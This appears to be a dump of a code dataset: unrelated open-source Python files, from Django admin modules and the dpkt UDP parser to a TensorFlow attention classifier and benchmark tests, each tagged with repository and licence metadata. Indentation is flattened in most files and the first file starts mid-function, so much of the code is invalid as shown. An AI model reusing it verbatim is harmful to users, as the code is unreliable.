rpc_acl=RpcACL.LOCAL_ALL,
rpc_dbupdate_listen=False,
rpc_discovery_timeout=0):
# Initialize environment
oainit(oag=self)
# Alphabetize
self._iteridx = 0
        self.is_proxy = initurl is not None
#### Set up proxies
# Database API
self._db_proxy = DbProxy(self, searchprms, searchidx, searchwin, searchoffset, searchdesc, initschema, throw_on_empty)
# Relational Dataframe manipulation
self._rdf_proxy = RdfProxy(self)
# Set attributes on OAG and keep them in sync with cframe
self._prop_proxy = PropProxy(self)
# Manage oagprop state
self._cache_proxy = CacheProxy(self)
# All RPC operations
self._rpc_proxy = RpcProxy(self,
initurl=initurl,
rpc_enabled=rpc,
rpc_acl_policy=rpc_acl,
rpc_dbupdate_listen=rpc_dbupdate_listen,
rpc_discovery_timeout=rpc_discovery_timeout,
heartbeat_enabled=heartbeat)
# All REST operations
self._rest_proxy = RestProxy(self, rest_enabled=rest)
if not self._rpc_proxy.is_proxy:
self._prop_proxy._set_cframe_from_userprms(initprms, force_attr_refresh=True)
if self.db.searchprms:
self.db.search()
if self.is_unique:
self.props._set_attrs_from_cframe_uniq()
else:
self._rpc_proxy.proxied_streams = reqcls(self).register_proxy(self._rpc_proxy.proxied_url, 'proxy')['payload']
oalog.debug("Create {}, {}, {}".format(
self,
self.rpc.id if self.rpc.is_enabled else str(),
f"listening on {self.rpc.url}" if self.rpc.is_enabled else str()
), f='gc')
def __iter__(self):
if self.is_unique:
raise OAError("__iter__: Unique OAGraph object is not iterable")
else:
return self
def __next__(self):
if self.is_unique:
raise OAError("__next__: Unique OAGraph object is not iterable")
else:
if self._iteridx < self.size:
# Clear propcache
self.props.clear()
# Clear oagcache
self.cache.clear()
# Set cframe according to rdf
self.props._cframe = self.rdf._rdf_window[self._iteridx]
# Set attributes from cframe
self.props._set_attrs_from_cframe()
# Set up next iteration
self._iteridx += 1
return self
else:
self._iteridx = 0
self.cache.clear()
raise StopIteration()
def __setattr__(self, attr, newval, fastiter=False):
try:
# Sanity check
if self.rpc.is_proxy and attr in self.rpc.proxied_streams:
raise OAError("Cannot set value on a proxy OAG")
# Set new value
currval = self.props.add(attr, newval, None, None, False, False, fastiter)
except (AttributeError, OAGraphIntegrityError):
# Attribute errors means object has not been completely
# initialized yet; graph integrity errors mean we used
# property manager to manage property on the stoplist.
#
# In either case, default to using the default __setattr__
super(OAG_RootNode, self).__setattr__(attr, newval)
class OAG_RpcDiscoverable(OAG_RootNode):
@property
def is_unique(self): return False
@property
def context(self): return "openarc"
@staticproperty
def dbindices(cls):
return {
#Index Name------------Elements------Unique-------Partial
'rpcinfname_idx' : [ ['rpcinfname'], True , None ]
}
@staticproperty
def streams(cls): return {
'envid' : [ 'text', "", None ],
'heartbeat' : [ 'timestamp', "", None ],
'listen' : [ 'boolean', True, None ],
'rpcinfname' : [ 'text', "", None ],
'stripe' : [ 'int', 0 , None ],
'type' : [ 'text', "", None ],
'url' : [ 'text', "", None ],
}
@property
def is_valid(self):
return OATime().now-self.heartbeat < datetime.timedelta(seconds=oaenv.rpctimeout)
class OAG_RootD(OAG_RootNode):
@staticproperty
def context(cls): return "openarc"
@staticproperty
def daemonname(cls): return cls.dbtable
@staticproperty
def dbindices(cls): return {
'host' : [ ['host'], False, None ]
}
@staticproperty
def streams(cls): return {
'host' : [ 'text', str, None ],
'port' : [ 'int', int, None ],
}
@staticproperty
def streamable(cls): return False
def __enter__(self):
try:
self.db.create()
with open(self.pidfile, 'w') as f:
f.write(str(os.getpid()))
return self
except Exception as e:
print('[STARTUP ERROR]', e)
self.__exit__(code=1)
def __exit__(self, *args, code=0):
try:
self.db.delete()
except Exception as e:
print('[CLEANUP WARNING]', e)
try:
os.unlink(self.pidfile)
except Exception as e:
print('[CLEANUP WARNING]', e)
sys.exit(code)
def start(self, pidfile=None, cfgfile=None):
def get_cfg_file_path():
# If cfgfile has been specified, you are lucky. If not, do song
# and dance to figure out where it is.
if cfgfile:
cfg_file_path = cfgfile
else:
cfgname = f'{self.daemonname}.conf'
cfg_dir = os.environ.get("XDG_CONFIG_HOME")
if not cfg_dir:
for l in [f'~/.config/{cfgname}', f'/usr/local/etc/{cfgname}' ]:
cfg_file_path = os.path.expanduser(l)
if os.path.exists(cfg_file_path):
break
else:
cfg_file_path = os.path.join(cfg_dir, f'{cfgname}')
return cfg_file_path
oaenv.merge_app_cfg(get_cfg_file_path())
def get_pid_file_path():
if pidfile:
return pidfile
else:
pidname = f'{self.daemonname}.pid'
xdg_rdir = os.environ.get("XDG_RUNTIME_DIR")
rdir = xdg_rdir if xdg_rdir else '/var/run'
return f'{rdir}/{pidname}'
self.pidfile = get_pid_file_path()
hostname = socket.gethostname()
# Are there too many stripes?
allowed_ports = [oaenv.app.startport+stripe for stripe in range(oaenv.app.stripes)]
try:
_d = self.__class__(hostname, 'by_host')
occupied_ports = [dd.port for dd in _d]
except OAGraphRetrieveError as e:
occupied_ports = []
if len(occupied_ports)==len(allowed_ports):
raise OAError("All necessary stripes are already running")
# set up and run this daemon
self.host = hostname
self.port = list(set(allowed_ports)-set(occupied_ports))[0]
with self as daemon:
signal.signal(signal.SIGTERM, self.__exit__)
signal.signal(signal.SIGINT, self.__exit__)
daemon.REST.start(port=self.port)
| kchoudhu/openarc | openarc/_graph.py | Python | bsd-3-clause | 18,675 |
from django.contrib import admin
from django.db.models import Sum
from sorl.thumbnail.admin import AdminImageMixin
from .admin_views import download_donor_report
from .models import DjangoHero, Donation, InKindDonor, Payment, Testimonial
class DonatedFilter(admin.DateFieldListFilter):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.title = 'donation date'
class DonationInline(admin.TabularInline):
fields = ['id', 'created', 'interval', 'subscription_amount']
extra = 0
model = Donation
@admin.register(DjangoHero)
class DjangoHeroAdmin(AdminImageMixin, admin.ModelAdmin):
actions = [download_donor_report]
inlines = [DonationInline]
list_filter = [
'approved', 'created', 'modified', 'hero_type', 'is_visible',
'is_subscribed', ('donation__created', DonatedFilter),
]
list_display = ['id', 'name', 'email', 'created', 'modified', 'approved', 'hero_type']
list_editable = ['approved', 'hero_type']
ordering = ['-created']
search_fields = ['name', 'email', 'stripe_customer_id']
class PaymentInline(admin.TabularInline):
readonly_fields = ['date']
extra = 0
model = Payment
@admin.register(Donation)
class DonationAdmin(admin.ModelAdmin):
raw_id_fields = ['donor']
list_display = ['id', 'amount', 'donor', 'created', 'modified', 'is_active']
list_filter = ['created', 'modified', 'interval']
ordering = ['-created']
inlines = [PaymentInline]
search_fields = ['donor__name', 'donor__email', 'donor__stripe_customer_id']
def get_queryset(self, request):
"""Annotate the sum of related payments to every donation."""
        qs = super().get_queryset(request)
return qs.annotate(amount=Sum('payment__amount'))
def amount(self, obj):
# Since amount is an annotated field, it is not recognized as a property
# of the model for list_display so we need an actual method that
# references it.
return obj.amount
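    # Optional: since ``amount`` is the annotation added in get_queryset
    # above, pointing admin_order_field at it makes the column sortable in
    # the change list.
    amount.admin_order_field = 'amount'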
@admin.register(Payment)
class PaymentAdmin(admin.ModelAdmin):
list_display = ('id', 'amount', 'stripe_charge_id', 'date', 'donation')
list_select_related = ('donation__donor',)
ordering = ['-date']
raw_id_fields = ('donation',)
search_fields = [
'stripe_charge_id',
'donation__donor__name',
'donation__donor__email',
'donation__donor__stripe_customer_id',
]
@admin.register(Testimonial)
class TestimonialAdmin(admin.ModelAdmin):
pass
admin.site.register(InKindDonor)
| nanuxbe/django | fundraising/admin.py | Python | bsd-3-clause | 2,556 |
import logging
import plugins.metric.metric as metric
class ReadmeMetric(metric.Metric):
"""
Locate a README file
Looks in the root of the repository, for files named: 'README', 'README.txt', 'README.md', 'README.html'
Scores:
0 if no README found
100 if README file with non-zero length contents is found
"""
NAME = "README"
IDENTIFIER = "uk.ac.software.saf.readme"
SELF_ASSESSMENT = False
CATEGORY = "USABILITY"
SHORT_DESCRIPTION = "Has a README file?"
LONG_DESCRIPTION = "Test for the existence of file 'README'."
def run(self, software, helper):
"""
:param software: An Software entity
:param helper: A Repository Helper
:return:
"""
self.score = 0
candidate_files = helper.get_files_from_root(['README', 'README.txt', 'README.md', 'README.html'])
        for file_name, file_contents in candidate_files.items():
            logging.info('Locating README: checking %s', file_name)
            if file_contents:
                self.score = 100
                self.feedback = "README found"
                break
        else:
            self.feedback = ("A short, descriptive, README file can provide "
                             "a useful first port of call for new users.")
def get_score(self):
"""Get the results of running the metric.
:returns:
0 if no README found
100 if an identifiable README is found
"""
return self.score
def get_feedback(self):
"""
A few sentences describing the outcome, and providing tips if the outcome was not as expected
:return:
"""
return self.feedback
| softwaresaved/software-assessment-framework | plugins/metric/readme.py | Python | bsd-3-clause | 1,737 |
# $Id: udp.py 23 2006-11-08 15:45:33Z dugsong $
"""User Datagram Protocol."""
import dpkt
import dns
UDP_PORT_MAX = 65535
class UDP(dpkt.Packet):
__hdr__ = (
('sport', 'H', 0xdead),
('dport', 'H', 0),
('ulen', 'H', 8),
('sum', 'H', 0)
)
    def unpack(self, buf):
        dpkt.Packet.unpack(self, buf)
        if self.sport == 53 or self.dport == 53:
            # Assume it's DNS; fall back to the raw payload if parsing fails
            try:
                self.data = dns.DNS(self.data)
            except dpkt.UnpackError:
                pass
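# Minimal usage sketch (header bytes are illustrative only): parse a raw
# 8-byte UDP header with an empty payload.
#
#     buf = '\xde\xad\x00\x50\x00\x08\x00\x00'  # sport=0xdead, dport=80, ulen=8
#     u = UDP(buf)
#     assert (u.sport, u.dport, u.ulen) == (0xdead, 80, 8)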
| insomniacslk/dpkt | dpkt/udp.py | Python | bsd-3-clause | 473 |
import os
from matplotlib import pyplot as plt
import numpy as np
import matplotlib.gridspec as gridspec
import class_objects as co
import cv2
import action_recognition_alg as ara
from textwrap import wrap
def extract_valid_action_utterance(action, testing=False, *args, **kwargs):
'''
    Visualizes an action or a testing dataset using predefined locations in
config.yaml and the method co.draw_oper.plot_utterances
'''
dataset_loc = '/media/vassilis/Thesis/Datasets/PersonalFarm/'
results_loc = '/home/vassilis/Thesis/KinectPainting/Results/DataVisualization'
ground_truth,breakpoints,labels = co.gd_oper.load_ground_truth(action, ret_labs=True,
ret_breakpoints=True)
images_base_loc = os.path.join(dataset_loc, 'actions',
'sets' if not testing else 'whole_result')
images_loc = os.path.join(images_base_loc, action.replace('_',' ').title())
imgs, masks, sync, angles, centers, samples_indices = co.imfold_oper.load_frames_data(images_loc,masks_needed=True)
masks_centers = []
xdim = 0
ydim = 0
conts = []
tmp = []
for mask,img in zip(masks,imgs):
conts = cv2.findContours(mask,cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[1]
conts_areas = [cv2.contourArea(cont) for cont in conts]
tmp.append(np.sum(mask*img>0))
if np.sum(mask*img>0) < 500:
masks_centers.append(None)
else:
cont = conts[np.argmax(conts_areas)]
x,y,w,h = cv2.boundingRect(cont)
if w == 0 or h == 0:
masks_centers.append(None)
else:
masks_centers.append([y+h/2,x+w/2])
xdim = max(w,xdim)
ydim = max(h,ydim)
cropped_imgs = []
for img, center in zip(imgs, masks_centers):
if center is not None:
cropped_img =img[max(0,center[0]-ydim/2)
:min(img.shape[0],center[0]+ydim/2),
max(0,center[1]-xdim/2)
:min(img.shape[0],center[1]+xdim/2)]
inp_img = np.zeros((ydim, xdim))
inp_img[:cropped_img.shape[0],:cropped_img.shape[1]] = cropped_img
cropped_imgs.append(inp_img)
else:
cropped_imgs.append(None)
return cropped_imgs, sync, ground_truth, breakpoints, labels
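# Illustrative call sketch (the action name is hypothetical): returns the
# cropped frames (None where the hand mask was unusable), their sync indices,
# and the ground truth segmentation.
#
#     frames, sync, gt, breakpoints, labels = \
#         extract_valid_action_utterance('paint_wave')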
def construct_table(action_type):
fil = os.path.join(co.CONST['rosbag_location'],
'gestures_type.csv')
if os.path.exists(fil):
with open(fil, 'r') as inp:
for line in inp:
if line.split(':')[0].lower() == action_type.lower():
used_actions = line.split(
':')[1].rstrip('\n').split(',')
else:
        raise Exception('Gesture type definitions file not found: ' + fil)
SHOWN_IMS = 10
actions = [action for action in os.listdir(co.CONST['actions_path'])
if action in used_actions]
print actions
images=[]
for action in actions:
print 'Processing', action
whole = os.path.join(co.CONST['actions_path'],action)
cnt = 0
(frames, frames_sync,
ground_truth, breakpoints, labels) =\
extract_valid_action_utterance(action.replace(' ','_').lower())
for (start, end) in zip(breakpoints[action][0],
breakpoints[action][1]):
if (start in frames_sync
and end in frames_sync and
end-start > SHOWN_IMS):
rat_of_nans = sum([img is None for img
in frames[frames_sync.index(start):
frames_sync.index(end)]]) / float(
end-start+1)
if rat_of_nans < 0.1:
break
cnt += 1
masks = os.path.join(whole, co.CONST['hnd_mk_fold_name'], str(cnt))
data = os.path.join(whole, co.CONST['mv_obj_fold_name'], str(cnt))
start = breakpoints[action][0][cnt]
end = breakpoints[action][1][cnt]
angles = []
with open(os.path.join(data, 'angles.txt'), 'r') as inp:
angles += map(float, inp)
centers = []
with open(os.path.join(data, 'centers.txt'), 'r') as inp:
for line in inp:
center = [
float(num) for num
in line.split(' ')]
centers += [center]
fils = sorted(os.listdir(masks))
inds = np.array([int(filter(str.isdigit,fil)) for fil in fils])
imgset = []
prev_size = 0
for ind in (np.linspace(0,len(fils)-1,SHOWN_IMS)).astype(int):
count = ind
while True:
                mask = cv2.imread(os.path.join(masks, fils[count]), 0) > 0  # index with count so the loop can advance past too-small masks
if np.sum(mask) > 0.6 * (prev_size) or count == len(inds)-1:
prev_size = np.sum(mask)
break
else:
count += 1
img = (cv2.imread(os.path.join(data,fils[count]),-1)*
mask)
processed_img = co.pol_oper.derotate(
img,
angles[count], centers[count])
img,_,_ = ara.prepare_im(processed_img,square=True)
img = np.pad(cv2.equalizeHist(img.astype(np.uint8)),[[0,0],[5,5]],
mode='constant', constant_values=155)
imgset.append(img)
images.append(imgset)
images = np.array(images)
images = list(images)
im_indices = np.arange(SHOWN_IMS)
left, width = .25, .5
bottom, height = .25, .5
right = left + width
top = bottom + height
gs = gridspec.GridSpec(len(images), 1+SHOWN_IMS)
gs.update(wspace=0.0, hspace=0.0)
fig = plt.figure(figsize=(1+SHOWN_IMS, len(images)))
fig_axes = fig.add_subplot(gs[:,:],adjustable='box-forced')
fig_axes.set_xticklabels([])
fig_axes.set_yticklabels([])
fig_axes.set_xticks([])
fig_axes.set_yticks([])
fig_axes.set_aspect('auto')
fig.subplots_adjust(wspace=0, hspace=0)
im_inds = np.arange(len(images)*(1+SHOWN_IMS)).reshape(
len(images),1+SHOWN_IMS)[:,1:].ravel()
txt_inds = np.arange(len(images)*(1+SHOWN_IMS)).reshape(
len(images),1+SHOWN_IMS)[:,:1].ravel()
axes = [fig.add_subplot(gs[i]) for i in range(len(images)*
(1+SHOWN_IMS))]
im_axes = list(np.array(axes)[im_inds])
for axis in axes:
axis.set_xticklabels([])
axis.set_yticklabels([])
axis.set_xticks([])
axis.set_yticks([])
ax_count = 0
for im_set_count in range(len(images)):
for im_count in list(im_indices):
im_shape = list(images[im_set_count])[im_count].shape
axes[im_inds[ax_count]].imshow(list(images[im_set_count])[
im_count], aspect='auto',cmap='gray')
axes[im_inds[ax_count]].set_xlim((0,max(im_shape)))
axes[im_inds[ax_count]].set_ylim((0,max(im_shape)))
ax_count += 1
ax_count = 0
info = np.array(actions)
for im_count in range(len(images)):
text = ('\n').join(wrap(info[im_count],10))
axes[txt_inds[ax_count]].text(0.5*(left+right), 0.5*(bottom+top),
text,
horizontalalignment='center',
verticalalignment='center',
fontsize=9)
ax_count+=1
cellText = [['Gesture']+[str(i) for i in range(SHOWN_IMS)]]
col_table = fig_axes.table(cellText=cellText,
cellLoc='center',
loc='top')
save_fold = os.path.join(co.CONST['results_fold'],
'Classification',
'Total')
co.makedir(save_fold)
plt.savefig(os.path.join(save_fold,action_type + 'actions_vocabulary.pdf'))
construct_table('dynamic')
construct_table('passive')
|
VasLem/KinectPainting
|
construct_actions_table.py
|
Python
|
bsd-3-clause
| 8,161
|
from .assign import Assign
from .variables import *
Declare = "cx_double %(name)s ;"
Imag = "cx_double(0, %(value)s)"
|
jonathf/matlab2cpp
|
src/matlab2cpp/rules/_cx_double.py
|
Python
|
bsd-3-clause
| 119
|
from django.db import models
# Create your models here.
class FileUpload(models.Model):
title = models.CharField(max_length=128)
file = models.FileField(upload_to='uploads')
created = models.DateTimeField(auto_now_add=True)
edited = models.DateTimeField(auto_now=True)
def __unicode__(self):
return self.title
|
brendan1mcmanus/whartonfintech-v3
|
file_upload/models.py
|
Python
|
bsd-3-clause
| 326
|
from django.contrib import admin
from django.contrib.sites.models import RequestSite
from django.contrib.sites.models import Site
from django.utils.translation import ugettext_lazy as _
from .models import RegistrationProfile
class RegistrationAdmin(admin.ModelAdmin):
actions = ['activate_users', 'resend_activation_email']
list_display = ('user', 'activation_key_expired')
raw_id_fields = ['user']
search_fields = ('user__username', 'user__first_name', 'user__last_name', 'user__email')
def activate_users(self, request, queryset):
"""
        Activates the selected users, if they are not already
activated.
"""
for profile in queryset:
RegistrationProfile.objects.activate_user(profile.activation_key)
activate_users.short_description = _("Activate users")
def resend_activation_email(self, request, queryset):
"""
Re-sends activation emails for the selected users.
Note that this will *only* send activation emails for users
who are eligible to activate; emails will not be sent to users
whose activation keys have expired or who have already
activated.
"""
if Site._meta.installed:
site = Site.objects.get_current()
else:
site = RequestSite(request)
for profile in queryset:
if not profile.activation_key_expired():
profile.send_activation_email(site)
resend_activation_email.short_description = _("Re-send activation emails")
admin.site.register(RegistrationProfile, RegistrationAdmin)
|
husarion/django-registration
|
registration/admin.py
|
Python
|
bsd-3-clause
| 1,611
|
import tensorflow as tf
from global_module.settings_module import set_params, set_dir
class DeepAttentionClassifier:
def __init__(self, params, dir_obj):
self.params = params
self.dir_obj = dir_obj
self.call_pipeline()
def call_pipeline(self):
self.create_network_pipeline()
def create_network_pipeline(self):
self.create_placeholders()
self.create_rnn_cell()
self.embedding_layer_lookup()
self.run_rnn()
if self.params.use_attention:
self.apply_attention()
self.compute_cost()
if self.params.mode == 'TR':
self.train()
def create_placeholders(self):
with tf.variable_scope('emb_var'):
self.word_emb_matrix = tf.get_variable("word_embedding_matrix", shape=[self.params.vocab_size, self.params.EMB_DIM], dtype=tf.float32)
with tf.variable_scope('placeholders'):
self.word_input = tf.placeholder(name="word_input", shape=[self.params.batch_size, self.params.MAX_SEQ_LEN], dtype=tf.int32)
self.seq_length = tf.placeholder(name="seq_len", shape=[self.params.batch_size], dtype=tf.int32)
self.label = tf.placeholder(name="labels", shape=[self.params.batch_size], dtype=tf.int32)
def create_rnn_cell(self):
if self.params.rnn_cell == 'lstm':
self.rnn_cell = tf.nn.rnn_cell.MultiRNNCell([self.get_lstm_cell() for _ in range(self.params.NUM_LAYER)])
else:
self.rnn_cell = tf.nn.rnn_cell.MultiRNNCell([self.get_gru_cell() for _ in range(self.params.NUM_LAYER)])
def get_gru_cell(self):
with tf.variable_scope('gru_cell'):
rnn_cell = tf.contrib.rnn.GRUCell(num_units=self.params.RNN_HIDDEN_DIM)
rnn_cell = tf.contrib.rnn.DropoutWrapper(rnn_cell, input_keep_prob=self.params.keep_prob, output_keep_prob=self.params.keep_prob)
return rnn_cell
def get_lstm_cell(self):
with tf.variable_scope('lstm_cell'):
rnn_cell = tf.contrib.rnn.BasicLSTMCell(num_units=self.params.RNN_HIDDEN_DIM, forget_bias=1.0)
rnn_cell = tf.contrib.rnn.DropoutWrapper(rnn_cell, input_keep_prob=self.params.keep_prob, output_keep_prob=self.params.keep_prob)
return rnn_cell
def embedding_layer_lookup(self):
with tf.variable_scope('lookup'):
self.word_emb_feature = tf.nn.embedding_lookup(self.word_emb_matrix,
self.word_input,
name='word_emb_feature',
validate_indices=True)
def run_rnn(self):
with tf.variable_scope('rnn_block'):
if not self.params.bidirectional:
self.rnn_outputs, self.rnn_state = tf.nn.dynamic_rnn(cell=self.rnn_cell,
inputs=self.word_emb_feature,
sequence_length=self.seq_length,
dtype=tf.float32)
if self.params.rnn_cell == 'lstm':
self.rnn_state = self.rnn_state[self.params.NUM_LAYER-1][1]
else:
((fw_outputs, bw_outputs), (fw_state, bw_state)) = tf.nn.bidirectional_dynamic_rnn(cell_fw=self.rnn_cell,
cell_bw=self.rnn_cell,
inputs=self.word_emb_feature,
sequence_length=self.seq_length,
dtype=tf.float32)
self.rnn_outputs = tf.concat(values=(fw_outputs, bw_outputs), axis=2, name='concat_output')
if self.params.rnn_cell == 'lstm':
self.rnn_state = tf.concat(values=(fw_state[self.params.NUM_LAYER-1][1], bw_state[self.params.NUM_LAYER-1][1]), axis=1, name='concat_state')
# self.rnn_state = fw_state[1] + bw_state[1]
elif self.params.rnn_cell == 'gru':
self.rnn_state = tf.concat(values=(fw_state[self.params.NUM_LAYER-1], bw_state[self.params.NUM_LAYER-1]), axis=1, name='concat_state')
# self.rnn_state = fw_state + bw_state
def apply_attention(self):
with tf.variable_scope('attention'):
attention_vector = tf.get_variable(name='attention_vector',
shape=[self.params.ATTENTION_DIM],
dtype=tf.float32)
mlp_layer_projection = tf.layers.dense(inputs=self.rnn_outputs,
units=self.params.ATTENTION_DIM,
activation=tf.nn.tanh,
kernel_initializer=tf.contrib.layers.xavier_initializer(),
name='fc_attn')
attended_vector = tf.tensordot(mlp_layer_projection, attention_vector, axes=[[2], [0]])
attention_weights = tf.expand_dims(tf.nn.softmax(attended_vector), -1)
weighted_input = tf.matmul(self.rnn_outputs, attention_weights, transpose_a=True)
self.attention_output = tf.squeeze(weighted_input, axis=2)
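        # Added shape sketch (assuming rnn_outputs is [batch, seq_len, rnn_dim]):
        # mlp_layer_projection is [batch, seq_len, ATTENTION_DIM], the tensordot
        # collapses the last axis to [batch, seq_len], softmax plus expand_dims
        # yields [batch, seq_len, 1] weights, and the transposed matmul followed
        # by the squeeze leaves attention_output as [batch, rnn_dim] -- one
        # attention-pooled vector per sequence.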
def compute_cost(self):
with tf.variable_scope('dense_layers'):
with tf.variable_scope('dropout'):
if self.params.use_attention:
sentence_vector = tf.nn.dropout(self.attention_output, keep_prob=self.params.keep_prob, name='attention_vector_dropout')
else:
sentence_vector = tf.nn.dropout(self.rnn_state, keep_prob=self.params.keep_prob, name='rnn_state_dropout')
output1 = tf.layers.dense(inputs=sentence_vector,
units=self.params.num_classes,
activation=tf.nn.tanh,
kernel_initializer=tf.random_uniform_initializer(minval=-0.1, maxval=0.1),
bias_initializer=tf.constant_initializer(0.01),
name='fc_1')
with tf.variable_scope('last_layer'):
self.logits = tf.layers.dense(inputs=output1,
units=self.params.num_classes,
kernel_initializer=tf.contrib.layers.xavier_initializer(),
bias_initializer=tf.constant_initializer(0.01),
name='fc_logit')
with tf.name_scope('pred_acc'):
with tf.name_scope('prediction'):
self.probabilities = tf.nn.softmax(self.logits, name='softmax_probability')
self.prediction = tf.cast(tf.argmax(input=self.probabilities, axis=1, name='prediction'), dtype=tf.int32)
correct_prediction = tf.equal(self.prediction, self.label)
with tf.name_scope('accuracy'):
self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
with tf.variable_scope('loss'):
with tf.variable_scope('softmax_loss'):
gold_labels = tf.one_hot(indices=self.label, depth=self.params.num_classes, name='gold_label')
softmax_loss = tf.reduce_sum(tf.nn.softmax_cross_entropy_with_logits(labels=gold_labels, logits=self.logits), name='softmax_loss')
with tf.variable_scope('reg_loss'):
if self.params.mode == 'TR':
tvars = tf.trainable_variables()
l2_regularizer = tf.contrib.layers.l2_regularizer(scale=self.params.REG_CONSTANT, scope=None)
regularization_penalty = tf.contrib.layers.apply_regularization(l2_regularizer, tvars)
if self.params.is_word_trainable:
reg_penalty_word_emb = tf.contrib.layers.apply_regularization(l2_regularizer, [self.word_emb_matrix])
else:
reg_penalty_word_emb = 0
reg_loss = regularization_penalty - reg_penalty_word_emb
else:
reg_loss = 0
self.loss = softmax_loss + reg_loss
if self.params.mode == 'TR' and self.params.log:
self.train_loss = tf.summary.scalar('loss_train', self.loss)
self.train_accuracy = tf.summary.scalar('acc_train', self.accuracy)
elif self.params.mode == 'VA' and self.params.log:
valid_loss = tf.summary.scalar('loss_valid', self.loss)
valid_accuracy = tf.summary.scalar('acc_valid', self.accuracy)
self.merged_else = tf.summary.merge([valid_loss, valid_accuracy])
else:
self.merged_else = []
print('Loss Computation: DONE')
def train(self):
with tf.variable_scope('train'):
self._lr = tf.Variable(0.0, trainable=False, name='learning_rate')
with tf.variable_scope('optimize'):
tvars = tf.trainable_variables()
grads = tf.gradients(self.loss, tvars)
grads, _ = tf.clip_by_global_norm(grads, clip_norm=self.params.max_grad_norm)
grad_var_pairs = zip(grads, tvars)
optimizer = tf.train.GradientDescentOptimizer(self.lr, name='sgd')
self._train_op = optimizer.apply_gradients(grad_var_pairs, name='apply_grad')
# optimizer = tf.train.AdamOptimizer(learning_rate=1e-2, name='optimizer')
# optimizer = tf.train.AdadeltaOptimizer(learning_rate=self._lr, epsilon=1e-6, name='optimizer')
# self._train_op = optimizer.apply_gradients(zip(self.grads, tvars), name='apply_grad')
if self.params.log:
grad_summaries = []
for grad, var in grad_var_pairs:
if grad is not None:
grad_hist_summary = tf.summary.histogram("{}/grad/hist".format(var.name), grad)
sparsity_summary = tf.summary.scalar("{}/grad/sparsity".format(var.name), tf.nn.zero_fraction(grad))
grad_summaries.append(grad_hist_summary)
grad_summaries.append(sparsity_summary)
grad_summaries_merged = tf.summary.merge(grad_summaries)
self.merged_train = tf.summary.merge([self.train_loss, self.train_accuracy, grad_summaries_merged])
else:
self.merged_train = []
def assign_lr(self, session, lr_value):
session.run(tf.assign(self.lr, lr_value))
@property
def lr(self):
return self._lr
@property
def train_op(self):
return self._train_op
def main():
params = set_params.ParamsClass(mode='TR')
dir_obj = set_dir.Directory('TR')
classifier_obj = DeepAttentionClassifier(params, dir_obj)
if __name__ == '__main__':
main()
|
krayush07/deep-attention-text-classifier-tf
|
global_module/implementation_module/model.py
|
Python
|
bsd-3-clause
| 11,389
|
'''
Copyright (c) 2011, Joseph LaFata
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the unitbench nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
from nose.tools import assert_almost_equals, eq_
from unitbench import TimeSet, Benchmark, BenchResult, Reporter, CsvReporter
from unittest import TestCase
if sys.version_info < (3, 0):
from StringIO import StringIO
else:
from io import StringIO
class NullReporter(Reporter):
pass
class OneRun(Benchmark):
def warmup(self):
return 0
def repeats(self):
return 1
class TestBenchResult(TestCase):
def test_stats(self):
times = []
times.append(TimeSet(3, 1, 0))
times.append(TimeSet(4, 2, 0))
times.append(TimeSet(4, 4, 0))
times.append(TimeSet(5, 5, 0))
times.append(TimeSet(6, 7, 0))
times.append(TimeSet(8, 11, 0))
results = BenchResult("bench_sample1", 10, times)
eq_(results.name, "bench_sample1")
assert results.value == "10"
assert results.wall_min == 3
assert results.wall_max == 8
assert results.wall_mean == 5
assert_almost_equals(results.wall_variance, 2.67, places=2)
assert_almost_equals(results.wall_stddev, 1.63, places=2)
assert results.user_min == 1
assert results.user_max == 11
assert results.user_mean == 5
assert results.user_variance == 11.0
assert_almost_equals(results.user_stddev, 3.32, places=2)
class TestBenchmark(TestCase):
def test_warmup(self):
class sample(Benchmark):
def __init__(self):
self.count = 0
self.count2 = 0
def warmup(self):
return 4
def repeats(self):
return 0
def bench_count(self):
self.count += 1
def bench_count2(self, input):
self.count2 += 1
bm = sample()
bm.run(NullReporter())
assert bm.count == 4
assert bm.count2 == 4
def test_teardown(self):
""" teardown should be called regardless of errors
"""
class sample(Benchmark):
def __init__(self):
self.setup_count = 0
def setup(self):
self.setup_count += 1
if self.setup_count > 1:
raise ValueError
def teardown(self):
self.setup_count -= 1
if self.setup_count < 0:
raise ValueError
def bench_exception(self, input):
1/0
def bench_works(self):
pass
bm = sample()
self.assertRaises(ZeroDivisionError, bm.run)
assert bm.setup_count == 0
def test_input(self):
class SampleBase(OneRun):
def __init__(self):
self.passed_in = []
def bench_sample(self, input):
self.passed_in.append(input)
class InputGen(SampleBase):
def input(self):
i = 10
while i < 1000:
yield i
i *= 10
class InputList(SampleBase):
def input(self):
return [10, 100, 1000, 20]
bm = InputGen()
bm.run(NullReporter())
assert bm.passed_in == [10, 100]
bm = InputList()
bm.run(NullReporter())
assert bm.passed_in == [10, 100, 1000, 20]
def test_param_count(self):
class sample(OneRun):
def bench_no_params(self):
self.no_param = True
def bench_one_param(self, input):
self.one_param = True
bm = sample()
bm.run(NullReporter())
assert bm.no_param
assert bm.one_param
